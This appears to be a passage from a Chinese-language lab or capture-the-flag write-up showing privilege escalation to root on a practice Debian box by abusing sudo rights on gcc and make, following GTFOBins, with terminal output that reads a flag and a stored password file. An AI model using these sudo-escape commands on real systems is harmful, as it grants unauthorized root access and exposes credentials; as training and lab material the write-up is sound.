https://gtfobins.github.io/gtfobins/make/#sudo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
rodgar@debian:~$ sudo gcc -wrapper /bin/bash,-s .
root@debian:/home/rodgar# cd ~;ls -la
total 40
drwx------  5 root root 4096 oct 22  2024 .
drwxr-xr-x 20 root root 4096 oct 22  2024 ..
-rw-------  1 root root   26 oct 22  2024 .bash_history
-rw-r--r--  1 root root  571 abr 10  2021 .bashrc
drwx------  2 root root 4096 oct 13  2024 .cache
drwxr-xr-x  3 root root 4096 oct 13  2024 .local
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-rw-r--r--  1 root root   32 oct 22  2024 rodgarpass
-rw-r--r--  1 root root   41 oct 22  2024 rooo_-tt.txt
drwx------  2 root root 4096 oct 13  2024 .ssh
root@debian:~# cat rooo_-tt.txt 
44b3f261e197124e60217d6ffe7e71a8e0175ae0
root@debian:~# cat -A rodgarpass 
b45cffe084dd3d20d928bee85e7b0f2$

拿到rootshell,同理make也行。

1
2
3
4
5
rodgar@debian:~$ COMMAND='/bin/bash'
rodgar@debian:~$ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
root@debian:/home/rodgar# whoami;id
root
uid=0(root) gid=0(root) grupos=0(root)

image-20250606164618778

本文由作者按照 CC BY 4.0 进行授权